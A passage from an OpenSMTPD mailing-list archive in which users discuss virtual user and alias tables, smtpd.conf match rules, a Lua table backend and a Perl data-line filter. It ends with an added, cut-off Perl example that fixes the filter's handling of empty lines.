> make[2]: Entering directory '/root/build/opensmtpd-6.4.2p1/mk'
> Making all in smtpd
> make[3]: Entering directory '/root/build/opensmtpd-6.4.2p1/mk/smtpd'
> gcc -DHAVE_CONFIG_H -I. -I../..  -I../../smtpd -I../../openbsd-compat 
> -I../../openbsd-compat/err_h -I../../openbsd-compat/paths_h -I. 
> -I/usr/include  -DSMTPD_CONFDIR=\"/opt/smptd/etc\" 
> -DPATH_CHROOT=\"/opt/smptd/var/empty\" 
> -DPATH_SMTPCTL=\"/opt/smptd/sbin/smtpctl\" 
> -DPATH_MAILLOCAL=\"/opt/smptd/libexec/opensmtpd/mail.local\" 
> -DPATH_LIBEXEC=\"/opt/smptd/libexec/opensmtpd\" -DHAVE_CONFIG_H -DIO_SSL 
> -DCA_FILE=\"/etc/ssl/cert.pem\" -mtune=skylake -march=skylake 
> -fomit-frame-pointer -O2 -pipe  -fPIC -DPIC -Wall -Wpointer-arith 
> -Wuninitialized -Wsign-compare -Wformat-security 
> -Wsizeof-pointer-memaccess -Wno-pointer-sign -Wno-unused-result 
> -fno-strict-aliasing -fno-builtin-memset -fPIE -D_BSD_SOURCE 
> -D_DEFAULT_SOURCE  -D_GNU_SOURCE -DNEED_EVENT_ASR_RUN -c -o 
> ./../smtpd/smtpd-aliases.o `test -f '../../smtpd/aliases.c' 
> './'`../../smtpd/aliases.c
> ./../smtpd/aliases.c: In function 'aliases_get':
> ./../smtpd/aliases.c:56:23: warning: variable 'userbase' set but not 
> used [-Wunused-but-set-variable]
>    struct table    *userbase = NULL;
>     ^~~~
> ./../smtpd/aliases.c: In function 'aliases_virtual_get':
> ./../smtpd/aliases.c:114:23: warning: variable 'userbase' set but not 
> used [-Wunused-but-set-variable]
>    struct table    *userbase = NULL;
>     ^~~~
> gcc -DHAVE_CONFIG_H -I. -I../..  -I../../smtpd -I../../openbsd-compat 
> -I../../openbsd-compat/err_h -I../../openbsd-compat/paths_h -I. 
> -I/usr/include  -DSMTPD_CONFDIR=\"/opt/smptd/etc\" 
> 

Re: Virtual User handling

2019-08-31 Thread Edgar Pettijohn
On Fri, Aug 30, 2019 at 11:14:37PM -0500, Edgar Pettijohn wrote:
> On Fri, Aug 30, 2019 at 05:00:24PM +0200, Ede Wolf wrote:
> > Hello,
> > 
> >
> 
> Semi complete example at the bottom. I'll leave it to you to reverse translate
> to the old syntax. I didn't notice till after I was done and am too lazy to 
> change it. :) Also noticed while re-reading smtpd.conf(5) there is a `user' 
> keyword that can be used in an action:
> 
>  user username
>  Specify the username for performing the delivery, to be
>  looked up with getpwnam(3).
> 
>  This is used for virtual hosting where a single username
>  is in charge of handling delivery for all virtual users.
> 
>  This option is not usable with the mbox delivery method.
> 
> Not sure if it's available in whichever version you are using, but may make 
> things easier enough to warrant an upgrade.
>  
> > While trying to learn opensmtpd, amongst other things I am struggling with
> > the virtual user handling - for a non virtual domain setup.
> > 
> > From what I have been able to understand so far it seems, as if there is no
> > way to deliver mails to a lmtp socket, if there is not at least some
> > reference/mapping to a system user?
> > 
> > accept from any for domain "example.com" recipient  alias 
> > deliver to lmtp "/run/cyrus/lmtp" rcpt-to as nobody
> > 
> > where vusers contains:
> 
> vusers would need to be `key => value' pairs
> 
> > b...@example.com
> 
> This is a list. More suitable for a vdomains table.
> 
> > 
> > However, despite being listed in vusers, when trying to send a mail to bob,
> > it gets rejected with "550 Invalid recipient". Creating a systemuser "bob"
> > makes it work. But then I do not need the vusers table, so I am wondering,
> > is it possible to get along without the need for a system user?
> > Now the man page mentions a userbase parameter, and I assume, the according
> > table has to be in the format of the userinfo table mentioned in tables(5)?
> > What then effectively again refers to a system user - just with a mapping in
> > between.
> > 
> > My attempts with a single userlist instead so far either resulted in a
> > 'invalid use of table "susers" as USERBASE parameter' or simply a syntax
> > error.
> > 
> > Is that assumption correct? Is there no way of keeping virtual users
> > completely off the system or did I get something terribly wrong? Even when
> > not using mbox/Maildir at all, where this requirement could make sense?
> >
> 
> They are off the system, but some real user has to own the mailbox, etc...
>  
> > And since user filtering will eventually be done at an earlier stage, I
> > would like smtpd to be able to unconditionally forward any mail unaltered
> > (except aliases) to the lmtp socket.
> > 
> > So, in addition to bob@example as for the tests com I would like to be able
> > to use *@example.com or just example.com to not do any user checking at all.
> > Depending on the syntax requirements.
> > 
> > Is it possible to deactivate the user checking one way or the other?
> 
> you could use a catchall
> 
> /etc/mail/vusers
> 
> @ catchall
> 
> > 
> > Thanks for any insight or heads up on what I may have missed or
> > misunderstood.
> > 
> > 
> > Ede
> >
> 
> groupadd -g 5000 vmail
> useradd -g vmail -u 5000 vmail -d /var/vmail -m
> chown -R vmail.vmail /var/vmail
> 
> /etc/mail/userinfo
> 
> bob   5000:5000:/var/vmail/bob
> 
> /etc/mail/vusers
> 
> b...@example.com  bob
> 
> /etc/mail/smtpd.conf snippet
> 
> action "a01" lmtp "/var/cyrus/lmtp" rcpt-to  userbase  virtual 
>  
> # may need to finesse the above. I'm not using cyrus or userbase table, so 
> not 100 percent
> # sure if it will work as is.
> 
> match from all for domain  action "a01"

Another option (that I use):

/etc/mail/vusers

b...@example.com vmail

action "a01" lmtp "/var/cyrus/lmtp" rcpt-to virtual 
match from all for domain  action "a01"

No need for the userbase. I'm not really sure where a userbase table comes into 
play. Maybe someone out there using it can provide an example use case.

> 
> it sorta works...
> deathstar$ telnet localhost 25 
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 220 deathstar.my.domain ESMTP OpenSMTPD
> ehlo p.com
> 250-deathstar.my.domain Hello p.com [127.0.0.1], pl

Re: Virtual User handling

2019-08-30 Thread Edgar Pettijohn
On Fri, Aug 30, 2019 at 05:00:24PM +0200, Ede Wolf wrote:
> Hello,
> 
>

Semi complete example at the bottom. I'll leave it to you to reverse translate
to the old syntax. I didn't notice till after I was done and am too lazy to 
change it. :) Also noticed while re-reading smtpd.conf(5) there is a `user' 
keyword that can be used in an action:

 user username
 Specify the username for performing the delivery, to be
 looked up with getpwnam(3).

 This is used for virtual hosting where a single username
 is in charge of handling delivery for all virtual users.

 This option is not usable with the mbox delivery method.

Not sure if it's available in whichever version you are using, but may make 
things easier enough to warrant an upgrade.
 
> While trying to learn opensmtpd, amongst other things I am struggling with
> the virtual user handling - for a non virtual domain setup.
> 
> From what I have been able to understand so far it seems, as if there is no
> way to deliver mails to a lmtp socket, if there is not at least some
> reference/mapping to a system user?
> 
> accept from any for domain "example.com" recipient  alias 
> deliver to lmtp "/run/cyrus/lmtp" rcpt-to as nobody
> 
> where vusers contains:

vusers would need to be `key => value' pairs

> b...@example.com

This is a list. More suitable for a vdomains table.

> 
> However, despite being listed in vusers, when trying to send a mail to bob,
> it gets rejected with "550 Invalid recipient". Creating a systemuser "bob"
> makes it work. But then I do not need the vusers table, so I am wondering,
> is it possible to get along without the need for a system user?
> Now the man page mentions a userbase parameter, and I assume, the according
> table has to be in the format of the userinfo table mentioned in tables(5)?
> What then effectively again refers to a system user - just with a mapping in
> between.
> 
> My attempts with a single userlist instead so far either resulted in a
> 'invalid use of table "susers" as USERBASE parameter' or simply a syntax
> error.
> 
> Is that assumption correct? Is there no way of keeping virtual users
> completely off the system or did I get something terribly wrong? Even when
> not using mbox/Maildir at all, where this requirement could make sense?
>

They are off the system, but some real user has to own the mailbox, etc...
 
> And since user filtering will eventually be done at an earlier stage, I
> would like smtpd to be able to unconditionally forward any mail unaltered
> (except aliases) to the lmtp socket.
> 
> So, in addition to bob@example as for the tests com I would like to be able
> to use *@example.com or just example.com to not do any user checking at all.
> Depending on the syntax requirements.
> 
> Is it possible to deactivate the user checking one way or the other?

you could use a catchall

/etc/mail/vusers

@   catchall

> 
> Thanks for any insight or heads up on what I may have missed or
> misunderstood.
> 
> 
> Ede
>

groupadd -g 5000 vmail
useradd -g vmail -u 5000 vmail -d /var/vmail -m
chown -R vmail.vmail /var/vmail

/etc/mail/userinfo

bob 5000:5000:/var/vmail/bob

/etc/mail/vusers

b...@example.com bob

/etc/mail/smtpd.conf snippet

action "a01" lmtp "/var/cyrus/lmtp" rcpt-to  userbase  virtual 
 
# may need to finesse the above. I'm not using cyrus or userbase table, so not 
100 percent
# sure if it will work as is.

match from all for domain  action "a01"

it sorta works...
deathstar$ telnet localhost 25 
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 deathstar.my.domain ESMTP OpenSMTPD
ehlo p.com
250-deathstar.my.domain Hello p.com [127.0.0.1], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 36700160
250-DSN
250 HELP
mail from:
250 2.0.0 Ok
rcpt to: 
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself
to: u
from: me

hi bob.

.
250 2.0.0 0a7d910f Message accepted for delivery

a19e5552f2afe6dc smtp connected address=127.0.0.1 host=localhost
debug: aliases_virtual_get: 'bob' resolved to 1 nodes
debug: aliases_virtual_get: 'bob' resolved to 1 nodes
warn: smtpd: parent_forward_open: /var/mail/bob: No such file or directory
smtp: 0x1903053fd000: fd 13 from queue
smtp: 0x1903053fd000: message fd 13
smtp: 0x1903053fd000: message begin
debug: 0x19034b71f000: adding Date
debug: 0x19034b71f000: adding Message-ID
debug: 0x1903053fd000: end of message, error=0
a19e5552f2afe6dc smtp message msgid=0a7d910f size=335 nrcpt=1 proto=ESMTP
a19e5552f2afe6dc smtp envelope evpid=0a7d910fa2469b23 
from= to=
debug: scheduler: evp:0a7d910fa2469b23 scheduled (mda)
mda: new user a19e5554bded3360 for "userinfo:bob" delivering as "root"
debug: lka: userinfo userinfo:bob
debug: mda: new session a19e20bf2fa5 for user "userinfo:bob" evpid 
0a7d910fa2469b23
debug: mda: no more envelope for "userinfo:bob"
debug: 

Re: Question about match auth with the new syntax.

2019-08-28 Thread Edgar Pettijohn

On Aug 28, 2019 1:52 PM, Reio Remma  wrote:
>
> Hello!
>
> I've pretty much converted my setup to the new syntax now and I'm 
> wondering if I get this right.
>
> I understand that from local was changed to not include authenticated 
> users, but my question is does "match auth" match both authenticated and 
> local users?
>
> I currently have - "match auth from any for any action dkim" - and I see 
> that I can send mail from command line using that rule, so I'm guessing 
> yes. :)
>
> Maybe the man page could reflect these bits for match auth and match 
> from local.
>

Match from local for local is a default rule. You have to specifically negate 
it if you don't want it. 

Edgar

> Thanks!
> Reio
>


Re: stumped on virtual aliases

2019-08-24 Thread Edgar Pettijohn
On Sat, Aug 24, 2019 at 06:02:55PM +0200, Joseph A Borg wrote:
> AFAIK I can do that Edgar, I'm already filtering on domain, so the domain 
> stump is not really necessary. 
> 
> this is not an urgent work situation, I'm just trying things out and spent 
> way too much time understanding this not to bother the list. If there is a 
> workaround or it's a known issue it's fine. Most probably I'm 
> misunderstanding things.
> 
> Correct me if I'm wrong: I'm assuming, conceptually, that once the 
> aliases in a message's [RCPT TO list] are expanded, the new addresses go 
> through the rule set again and enqueued if they match something that ends up 
> in a mailbox, forwarded. At least that's what I remember from one of Gilles 
> articles. If I'm imagining too much then I'll try something else. :)
> 
> I'm trying to run smtpd -F -v -T all and not getting anything on the 
> command line.

-F logs to syslogd. If you want to see it try `smtpd -dv -T all'

Not entirely helpful, but I switched to sql tables because I couldn't figure 
out a similar situation.

Edgar

> 
> 
> regards to all on a sultry Saturday evening
> 
> 
> > On 24 Aug 2019, at 17:43, Edgar Pettijohn  wrote:
> > 
> > On Sat, Aug 24, 2019 at 04:14:21PM +0200, Joseph A Borg wrote:
> >> I'm trying to match an email: nos...@domain.tld to expand to 
> >> webmas...@domain.tld and deliver to local mailbox.
> >> 
> >> My setup is pretty simple and works well for virtual mailboxes linked to a 
> >> couple of virtual domains. now I'm trying to add aliases to some accounts.
> >> 
> >> From the error, it seems like smtpd is not transforming the alias address 
> >> into the final address for delivery.
> >> Seems like I'm not understanding how smtpd transforms a recipient 
> >> address in an  into the actual recipient for delivery.
> >> 
> >> I must be conceptually stumped on this one.
> >> 
> >> I get the following error in logs and a return mail from smtpd to sender:
> >> 
> >>> 
> >>> I'm sorry to have to inform you that your message could not
> >>> be delivered to one or more recipients.
> >>> 
> >>> 
> >>> : host mx.domain.tld[xxx.xxx.xxx.xxx] said: 550 Invalid
> >>>   recipient:  (in reply to RCPT TO command)
> >>> Reporting-MTA: dns; st43p00im-zteg10071901.me.com
> >>> X-Postfix-Queue-ID: 4E253D8138E
> >>> X-Postfix-Sender: rfc822; sen...@domain2.tld
> >>> Arrival-Date: Sat, 24 Aug 2019 10:24:30 + (UTC)
> >>> 
> >>> Final-Recipient: rfc822;nos...@domain.tld
> >>> Original-Recipient: rfc822;nos...@domain.tld
> >>> Action: failed
> >>> Status: 5.0.0
> >>> Remote-MTA: dns; mx.domain.tld
> >>> Diagnostic-Code: smtp; 550 Invalid recipient: 
> >>> 
> >>> From: 
> >>> Subject: Fwd: Undelivered Mail Returned to Sender
> >>> Date: 24 August 2019 at 12:24:27 GMT+2
> >>> To: nos...@domain.tld
> >>> 
> >> 
> >> 
> >> 
> >> the configuration files for the domain and tables follows.
> >> 
> >> 
> >> 
> >> 
> >> # file:/etc/mail/domain.tld/accounts/valiases:
> >> =
> >>> nospam webmas...@domain.tld
> >> ## EOF
> >> 
> >> # file:/etc/mail/domain.tld/accounts/emails
> >> 
> >>> webmas...@domain.tld::/home/domain/mail/master
> >>> webdus...@domain.tld::/home/domain/mail/duster
> >>> webbus...@domain.tld::/home/domain/mail/buster
> > 
> > I'm not sure this will work. I'm not sure you can map a virtual user to 
> > a single system user with multiple `homes'.
> > 
> > maybe try:
> > 
> > webmaster   ::/home/domain/mail/master
> > 
> > and see if that gets you further.
> > 
> >> ## EOF
> >> 
> >> # file:/etc/mail/domain.sub.smtpd.conf
> >> =
> >> 
> >>> ## =
> >>> ## DOMAIN CONFIGURATION:
> >>> ## =
> >>> # TABLE DECLARATIONS:
> >>> # ---
> >>> table domains   \
> >>>file:/etc/mail/domain.tld/domains
> >>> table valiases  \
> >>>file:/etc/mail/domain.tld/accounts/valiases
> >>> table e-boxes   \
> >>>file:/etc/mail/domain.tld/accounts/emails
> >>> 
> >>> # ACTIONS
> >>> # ---
> >>> action valiases_set \
> >>>expand-only \ 
> > 
> > Seems like expand-only should work with `virtual' aliases, but I'm not sure.
> > Maybe remove it and see what happens.
> > 
> >>>virtual 
> >>> action deliver_virtual_set  \
> >>>maildir \
> >>>userbase 
> >>> 
> >>> # MATCHES
> >>> # ---
> >>> match from any  \
> >>>  for domain   \
> >>>  action valiases_set
> >>> match from any  \
> >>>  for domain   \
> >>>  action deliver_virtual_set
> >>> 
> >>> 
> >> 
> > 
> > Hope this helps.
> > 
> > Edgar
> 



Re: stumped on virtual aliases

2019-08-24 Thread Edgar Pettijohn
On Sat, Aug 24, 2019 at 04:14:21PM +0200, Joseph A Borg wrote:
> I'm trying to match an email: nos...@domain.tld to expand to 
> webmas...@domain.tld and deliver to local mailbox.
> 
> My setup is pretty simple and works well for virtual mailboxes linked to a 
> couple of virtual domains. now I'm trying to add aliases to some accounts.
> 
> From the error, it seems like smtpd is not transforming the alias address 
> into the final address for delivery.
> Seems like I'm not understanding how smtpd transforms a recipient address 
> in an  into the actual recipient for delivery.
> 
> I must be conceptually stumped on this one.
> 
> I get the following error in logs and a return mail from smtpd to sender:
> 
> > 
> > I'm sorry to have to inform you that your message could not
> > be delivered to one or more recipients.
> > 
> > 
> > : host mx.domain.tld[xxx.xxx.xxx.xxx] said: 550 Invalid
> >recipient:  (in reply to RCPT TO command)
> > Reporting-MTA: dns; st43p00im-zteg10071901.me.com
> > X-Postfix-Queue-ID: 4E253D8138E
> > X-Postfix-Sender: rfc822; sen...@domain2.tld
> > Arrival-Date: Sat, 24 Aug 2019 10:24:30 + (UTC)
> > 
> > Final-Recipient: rfc822;nos...@domain.tld
> > Original-Recipient: rfc822;nos...@domain.tld
> > Action: failed
> > Status: 5.0.0
> > Remote-MTA: dns; mx.domain.tld
> > Diagnostic-Code: smtp; 550 Invalid recipient: 
> > 
> > From: 
> > Subject: Fwd: Undelivered Mail Returned to Sender
> > Date: 24 August 2019 at 12:24:27 GMT+2
> > To: nos...@domain.tld
> > 
> 
> 
> 
> the configuration files for the domain and tables follows.
> 
> 
> 
> 
> # file:/etc/mail/domain.tld/accounts/valiases:
> =
> > nospam webmas...@domain.tld
> ## EOF
> 
> # file:/etc/mail/domain.tld/accounts/emails
> 
> > webmas...@domain.tld::/home/domain/mail/master
> > webdus...@domain.tld::/home/domain/mail/duster
> > webbus...@domain.tld::/home/domain/mail/buster

I'm not sure this will work. I'm not sure you can map a virtual user to 
a single system user with multiple `homes'.

maybe try:

webmaster   ::/home/domain/mail/master

and see if that gets you further.

> ## EOF
> 
> # file:/etc/mail/domain.sub.smtpd.conf
> =
> 
> > ## =
> > ## DOMAIN CONFIGURATION:
> > ## =
> > # TABLE DECLARATIONS:
> > # ---
> > table domains   \
> > file:/etc/mail/domain.tld/domains
> > table valiases  \
> > file:/etc/mail/domain.tld/accounts/valiases
> > table e-boxes   \
> > file:/etc/mail/domain.tld/accounts/emails
> > 
> > # ACTIONS
> > # ---
> > action valiases_set \
> > expand-only \ 

Seems like expand-only should work with `virtual' aliases, but I'm not sure.
Maybe remove it and see what happens.

> > virtual 
> > action deliver_virtual_set  \
> > maildir \
> > userbase 
> > 
> > # MATCHES
> > # ---
> > match from any  \
> >   for domain   \
> >   action valiases_set
> > match from any  \
> >   for domain   \
> >   action deliver_virtual_set
> > 
> > 
> 

Hope this helps.

Edgar



Re: table api question

2019-08-24 Thread Edgar Pettijohn
On Sat, Aug 24, 2019 at 08:19:00AM +, gil...@poolp.org wrote:
> 24 August 2019 02:59 "Edgar Pettijohn"  wrote:
> 
> > I am writing a table-lua, however the table_lua_update function doesn't 
> > appear to be called.
> > Here are relevant pieces of the code.
> > 
> > The lookup function works. However, it would be more ideal to have the 
> > update() called early
> > to fill in the tables for the other functions. As is the lookup() has to do 
> > the work of both.
> > 
> > Any help is appreciated.
> > 
> 
> update is called when you issue an `smtpctl table update ` command.

Makes sense. However, the smtpctl manual says it's for tables using the "file" 
backend.

> 
> On a side note, I had this discussion with someone a few days ago but can't 
> remember
> who, so if it was you and you already know, disregard:
>
> I have a plan for the next two releases to switch the implementation of 
> tables to an
> API similar to that of filters, so we can have tables become scripts that 
> read lines
> from stdin, write answers to stdout, be written in any language, etc..
> 

Not me but sounds interesting.
 
> Not discouraging you from writing something using the current API, it is not 
> so much
> work anyways, but just letting you know that in a relatively short term your 
> code is
> going to need a rewrite.

I was using table-passwd as a bit of a go by. Armed with this new knowledge, I 
see that 
table_passwd_update is called from main.  I think that is what I need to do.

Thanks,

Edgar



table api question

2019-08-23 Thread Edgar Pettijohn
I am writing a table-lua, however the table_lua_update function doesn't appear 
to be called.
Here are relevant pieces of the code.

The lookup function works. However, it would be more ideal to have the update() 
called early
to fill in the tables for the other functions. As is the lookup() has to do the 
work of both.

Any help is appreciated.

Thanks,

Edgar

table_lua.c

static int
table_lua_update(void)
{
int ret;

lua_getglobal(L, "update");

lua_pushnil(L);
if (lua_pcall(L, 1, 1, 0)) {
log_warnx("warn: update: %s", lua_tostring(L, -1));
return -1;
}

ret = lua_toboolean(L, -1);

log_warnx("\t\tlua-update: %d\n", ret);
return ret;
}

int
main(int argc, char **argv)
{
int ch;
char *path;

log_init(1);

while ((ch = getopt(argc, argv, "")) != -1) {
switch (ch) {
default:
fatalx("bad option");
/* NOTREACHED */
}
}
argc -= optind;
argv += optind;

if (argc == 0)
fatalx("missing path");
path = argv[0];

L = luaL_newstate();

make_global_table(L, "service", services);
make_global_table(L, "Lookup", NULL);
make_global_table(L, "Fetch", NULL);
make_global_table(L, "Check", NULL);
make_global_table(L, "Update", NULL);

luaL_openlibs(L);
if (luaL_loadfile(L, path) || lua_pcall(L, 0, 0, 0))
fatalx("%s", lua_tostring(L, -1));

log_debug("debug: starting...");

table_api_on_update(table_lua_update);
table_api_on_check(table_lua_check);
table_api_on_lookup(table_lua_lookup);
table_api_on_fetch(table_lua_fetch);

table_api_dispatch();

log_debug("debug: exiting");

lua_close(L);

return 1;
}

table.lua

function update ()
io.stderr:write("\n\t\ttable-lua is updating\n")

return true
end




Re: filter assistance requested

2019-08-20 Thread Edgar Pettijohn

On Aug 20, 2019 4:29 AM, Gilles Chehade  wrote:
>
> On Mon, Aug 19, 2019 at 01:48:05PM -0500, Edgar Pettijohn wrote:
> > Nothing urgent here. Probably can wait for filter documentation. However, 
> > I've been
> > playing with filters off and on with limited success. It seems like 
> > data-line will 
> > be the most useful to filter on so that's been my focus lately. I have the 
> > following
> > script:
> > 
> > #!/usr/bin/perl
> > 
> > use strict;
> > use warnings;
> > use diagnostics;
> > 
> > open(my $fh, '>', '/tmp/log.txt') or die $!;
> > 
> > # remove line buffering
> > select(STDOUT);
> > $|++;
> > select($fh);
> > $|++;
> > 
> > print STDOUT "register|filter|smtp-in|data-line\n";
> > print STDOUT "register|ready\n";
> > 
> > while ( <> ) {
> > chomp; # get rid of newline
> > 
> > my @report = split /\|/;
> > 
> > next if $report[0] eq 'config';
> > 
> > foreach (@report) {
> > print $fh "$_\|"; # just to see whats there
> > }
> >  print $fh "\n";
> > 
> > my $inbody = 0;
> > my ($sid, $token, $line);
> > $sid = $report[5];
> > $token = $report[6];
> > $line = $report[$#report];
> > if ($report[0] eq 'filter' and $report[3] eq 'smtp-in' and 
> >$report[4] eq 'data-line') {
> > die "invalid filter command" if (scalar @report < 7);
> > if ($line eq '') { print $fh "end of headers\n"; $inbody++; 
> >}
> > if ($line eq '.') { print $fh "end of message\n"; 
> >$inbody--; }
> > print $fh "filter-dataline|$token|$sid|$line\n";
> > print STDOUT "filter-dataline|$token|$sid|$line\n";
> > }
> > }
> > 
> > close $fh;
> > 
> > 0;
> > 
> > It prints the following in /tmp/log.txt after a 
> > $ echo "HI" | mail edgar
> > 
> > filter|0|1566239933.835511|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Received:
> >  from localhost (deathstar.my.domain [local])|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Received: from localhost 
> > (deathstar.my.domain [local])
> > filter|0|1566239933.835523|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> >  by deathstar.my.domain (OpenSMTPD) with ESMTPA id 7052ea5a|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  by 
> > deathstar.my.domain (OpenSMTPD) with ESMTPA id 7052ea5a
> > filter|0|1566239933.835529|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> >  for ;|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  for 
> > ;
> > filter|0|1566239933.835533|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> >  Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  Mon, 19 Aug 2019 
> > 13:38:53 -0500 (CDT)
> > filter|0|1566239933.836673|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|From:
> >  Edgar Pettijohn |
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|From: Edgar Pettijohn 
> > 
> > filter|0|1566239933.836681|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Date:
> >  Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Date: Mon, 19 Aug 2019 
> > 13:38:53 -0500 (CDT)
> > filter|0|1566239933.836685|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|To:
> >  edgar|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|To: edgar
> > filter|0|1566239933.836688|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|ef8747a12860387a
> > filter|0|1566239933.836692|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|HI|
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|HI
> > filter|0|1566239933.836695|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|.|
> > end of message
> > filter-dataline|ef8747a12860387a|c0002b41f6bd164d|.
> > 
> > I get the following response:
> > deathstar$ sendmail: command failed: 550 5.7.1 Delivery not authorized, 
> > message refused: Message is not RFC 2822 compliant
> > 
> > I see the same from a telnet session as well.
> > 
> > So there are 2 problems. First my script doesn't appear to accurately 
> > determine that the headers are finished. Second mail
> > doesn't go through. Any suggestions are appreciated.
>

filter assistance requested

2019-08-19 Thread Edgar Pettijohn
Nothing urgent here. Probably can wait for filter documentation. However, I've 
been
playing with filters off and on with limited success. It seems like data-line 
will 
be the most useful to filter on so that's been my focus lately. I have the 
following
script:

#!/usr/bin/perl

use strict;
use warnings;
use diagnostics;

open(my $fh, '>', '/tmp/log.txt') or die $!;

# remove line buffering
select(STDOUT);
$|++;
select($fh);
$|++;

print STDOUT "register|filter|smtp-in|data-line\n";
print STDOUT "register|ready\n";

while ( <> ) {
chomp; # get rid of newline

my @report = split /\|/;

next if $report[0] eq 'config';

foreach (@report) {
print $fh "$_\|"; # just to see whats there
}
print $fh "\n";

my $inbody = 0;
my ($sid, $token, $line);
$sid = $report[5];
$token = $report[6];
$line = $report[$#report];
if ($report[0] eq 'filter' and $report[3] eq 'smtp-in' and $report[4] 
eq 'data-line') {
die "invalid filter command" if (scalar @report < 7);
if ($line eq '') { print $fh "end of headers\n"; $inbody++; }
if ($line eq '.') { print $fh "end of message\n"; $inbody--; }
print $fh "filter-dataline|$token|$sid|$line\n";
print STDOUT "filter-dataline|$token|$sid|$line\n";
}
}

close $fh;

0;

It prints the following in /tmp/log.txt after a 
$ echo "HI" | mail edgar

filter|0|1566239933.835511|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Received:
 from localhost (deathstar.my.domain [local])|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Received: from localhost 
(deathstar.my.domain [local])
filter|0|1566239933.835523|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a| 
by deathstar.my.domain (OpenSMTPD) with ESMTPA id 7052ea5a|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  by deathstar.my.domain 
(OpenSMTPD) with ESMTPA id 7052ea5a
filter|0|1566239933.835529|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a| 
for ;|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  for 
;
filter|0|1566239933.835533|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a| 
Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|  Mon, 19 Aug 2019 
13:38:53 -0500 (CDT)
filter|0|1566239933.836673|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|From:
 Edgar Pettijohn |
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|From: Edgar Pettijohn 

filter|0|1566239933.836681|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|Date:
 Mon, 19 Aug 2019 13:38:53 -0500 (CDT)|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|Date: Mon, 19 Aug 2019 
13:38:53 -0500 (CDT)
filter|0|1566239933.836685|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|To:
 edgar|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|To: edgar
filter|0|1566239933.836688|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|ef8747a12860387a
filter|0|1566239933.836692|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|HI|
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|HI
filter|0|1566239933.836695|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|.|
end of message
filter-dataline|ef8747a12860387a|c0002b41f6bd164d|.

I get the following response:
deathstar$ sendmail: command failed: 550 5.7.1 Delivery not authorized, message 
refused: Message is not RFC 2822 compliant

I see the same from a telnet session as well.

So there are 2 problems. First my script doesn't appear to accurately determine 
that the headers are finished. Second mail
doesn't go through. Any suggestions are appreciated.

Thanks,

Edgar
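
In the log above, the empty data line comes back as `filter-dataline|ef8747a12860387a|c0002b41f6bd164d|ef8747a12860387a`: Perl's `split` without a LIMIT drops trailing empty fields, so the last field of that event is the token, and the blank line between headers and body is never echoed to smtpd. The following is an added example, not code from the thread, that splits with a LIMIT and keeps the in-body flag per session outside the read loop; the field layout and reply order are copied from the lines in the post, and the sample input under `__DATA__` is constructed.

```perl
#!/usr/bin/perl
# Added example: data-line parsing that preserves empty payloads.
# Assumption: event layout and reply order are as shown in the post's log,
#   filter|<version>|<timestamp>|smtp-in|data-line|<sid>|<token>|<line>
#   filter-dataline|<token>|<sid>|<line>
use strict;
use warnings;

$| = 1;         # replies must not sit in a buffer

my %in_body;    # per-session state; must survive across loop iterations

# Split one event into its seven fixed fields plus the payload.
# LIMIT 8 stops after the seventh '|', so a payload containing '|' stays in
# one piece, and a non-zero LIMIT keeps a trailing empty field.
sub parse_data_line {
    my ($raw) = @_;
    $raw =~ s/\r?\n\z//;
    my @f = split /\|/, $raw, 8;
    return unless @f == 8;
    return unless $f[0] eq 'filter'
        and $f[3] eq 'smtp-in'
        and $f[4] eq 'data-line';
    return { sid => $f[5], token => $f[6], line => $f[7] };
}

# Returns (reply, position) for a data-line event, or an empty list for
# anything else. The payload is echoed back unchanged.
sub handle {
    my ($raw) = @_;
    my $ev = parse_data_line($raw) or return;
    my ($sid, $token, $line) = @{$ev}{qw(sid token line)};

    my $where = $in_body{$sid} ? 'body' : 'headers';
    if ($line eq '.') {
        delete $in_body{$sid};          # message finished, forget the session
        $where = 'end of message';
    } elsif (!$in_body{$sid} and $line eq '') {
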